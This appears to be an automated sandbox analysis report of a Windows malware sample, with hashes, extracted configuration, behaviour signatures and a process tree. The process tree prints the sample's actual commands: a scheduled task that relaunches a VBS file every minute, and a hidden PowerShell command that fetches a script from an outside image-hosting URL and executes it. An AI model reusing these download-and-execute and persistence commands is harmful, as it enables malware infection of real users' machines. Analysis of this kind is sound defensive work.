Analysis

  • max time kernel
    48s
  • max time network
    80s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    07/08/2023, 12:23

General

  • Target

    feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe

  • Size

    6KB

  • MD5

    77421b1f90fc1e9247f693e857e8c429

  • SHA1

    63c26635980d5a185a24d1be79c877a1e8507133

  • SHA256

    feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc

  • SHA512

    0bb90e930e0856504631a95792175a149b8565a9acbfdbe68a74e13573e00f1eb433b3c73439523e670b3b66559619c3c85efce9881544f0381afc88e3e8b095

  • SSDEEP

    96:1jYUzP8hRH7AKjC2LcS14bqxqsmthY2VxEzNt:Fz8hRb1CNSGJsmjYSu

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
    URLs
  • ps1.dropper
    https://a.top4top.net/p_814sg63b2.jpg

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
    "C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2968
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"
      2⤵
      • Creates scheduled task(s)
      PID:4836
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"
    1⤵
    PID:2136
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
      2⤵
      PID:4296
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
        3⤵
        PID:4572

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs

    Filesize
    537B

    MD5
    44476af998bf0a5714e3ab100f022a1e

    SHA1
    bf26b1f4227b8bfc27d4a7cb2a1cdd4ad224d08e

    SHA256
    ef4eae75f800b98fb7c189bd92ba4a1db6d1cc665791634d5ec3c3fe535c1ec2

    SHA512
    e02c3d2590f478deafaf3f20c421951c26ccf966817a7299fe2a4ede856190960f1853a4a2907d28f2ff24a357e9d0c039a69d1ee5f53e5c9ffde428d911bd99

  • memory/2968-133-0x000001D5F6410000-0x000001D5F6418000-memory.dmp

    Filesize
    32KB

  • memory/2968-135-0x00007FFD20C60000-0x00007FFD21721000-memory.dmp

    Filesize
    10.8MB

  • memory/2968-137-0x00007FFD20C60000-0x00007FFD21721000-memory.dmp

    Filesize
    10.8MB

  • memory/4572-139-0x00007FFD1F950000-0x00007FFD20411000-memory.dmp

    Filesize
    10.8MB